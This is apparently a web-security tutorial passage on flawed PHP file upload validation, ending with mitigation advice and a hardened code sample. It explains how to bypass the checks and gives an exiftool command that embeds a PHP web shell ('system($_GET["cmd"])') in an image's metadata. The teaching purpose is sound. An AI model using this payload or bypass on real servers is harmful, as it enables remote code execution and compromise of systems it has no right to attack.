
The challenge

So the developers applied the following fix:

$valid = false;
if (preg_match('/^image/', $_FILES['file']['type'])) {
    $info = getimagesize($_FILES['file']['tmp_name']);
    if (!empty($info)) {
        $valid = true;
    }
} elseif (preg_match('/^video/', $_FILES['file']['type'])) {
    $valid = true;
} else {
    @unlink($_FILES['file']['tmp_name']);
}

if ($valid) {
    move_uploaded_file(
        $_FILES['file']['tmp_name'],
        'images' . '/' . $_FILES['file']['name']
    );
}

The code now checks the declared type of the file and, for images, verifies them with getimagesize(). However, there are a few issues with this check:

  • the type of the file is checked via the Content-Type header, which is passed to the script by the client, and therefore, can be easily modified;
  • the script is not checking the file extension, and you can still upload a .php file;
  • the check for the videos is only based on the Content-Type header.
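To see why the Content-Type checks are cosmetic, note that $_FILES['file']['type'] simply echoes the client-supplied header, so the regex accepts any forged value (a minimal sketch):

```php
<?php
// The attacker uploads shell.php but declares it as an image;
// PHP copies the client-supplied header into $_FILES['file']['type'].
$forged_type = 'image/jpeg';   // set via an intercepting proxy

// The server-side check happily passes:
var_dump((bool) preg_match('/^image/', $forged_type));  // bool(true)
```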


It is fairly easy to evade this kind of file upload protection. The easiest thing, of course, is to upload a PHP script while changing the Content-Type header of the HTTP request to an image/* or video/* type. To do this, you need to intercept the outgoing HTTP request with a local proxy, such as Burp or WebScarab, though Tamper Data for Firefox will do just fine. You can also upload a valid image and hide PHP code in its EXIF metadata. To do this, you can insert the code in the Comment field, e.g.:

$ exiftool -Comment='<?php system($_GET["cmd"]); ?>' info.php
    1 image files updated

When you upload the image with a .php extension, it will be handled by the PHP interpreter, and the code in the comment will be executed on the server. Depending on the server configuration, you might also be able to upload the image with a .php.jpg extension. If the check for the extension is not done correctly, and the server configuration allows it, you can still get code execution. Easy, eh?


So what can be done to prevent this? With a mixture of secure coding and some server-side tweaks, you can achieve pretty secure file upload functionality.

  • [Code] Check for the Content-Type header. This may fool some script kiddies or less-determined attackers.
  • [Code] Check for the file extension. Replace .php, .py, etc. with, say, _php, _py, etc.
  • [Server] Disable script execution in the upload directory. Even if a script is uploaded, the web server will not execute it.
  • [Server] Disable HTTP access to the upload directory if the files are only meant to be accessed by scripts through the file system. Otherwise, although an uploaded script will not be executed locally on your server, it could still be used in Remote File Inclusion attacks: if attackers target another server running an application with an RFI vulnerability and allow_url_include enabled, they can upload a script to your server and use it to get a shell on the vulnerable machine.
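The code-side checks above can be combined into a single helper. The sketch below is one possible implementation (the whitelists and the random-name scheme are example choices, not the original application's code):

```php
<?php
// Example whitelists - adjust to the application's needs.
$allowed_ext  = ['jpg', 'jpeg', 'png', 'gif'];
$allowed_mime = ['image/jpeg', 'image/png', 'image/gif'];

function is_allowed_upload($client_name, $tmp_path, $allowed_ext, $allowed_mime)
{
    // Extension check on the client-supplied name (last extension only).
    $ext = strtolower(pathinfo($client_name, PATHINFO_EXTENSION));
    if (!in_array($ext, $allowed_ext, true)) {
        return false;
    }
    // MIME type detected from the file *contents*, not the Content-Type header.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    return in_array($finfo->file($tmp_path), $allowed_mime, true);
}

// On success, never reuse the client-supplied name; store under a
// random, server-chosen one so tricks like shell.php.jpg are neutralized:
//   $target = $upload_dir . '/' . bin2hex(random_bytes(16)) . '.' . $ext;
```

Even then, keep the server-side rules in place: content checks alone will not stop a valid JPEG with PHP code hidden in its EXIF comment.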


Developers often forget that relying on client-side controls is a bad idea. They should always code under the assumption that the application may be (ab)used by a malicious user. Everything on the client side can be controlled and, therefore, evaded. The more you check the user input, the better. And of course, the server configuration should be as hardened as possible.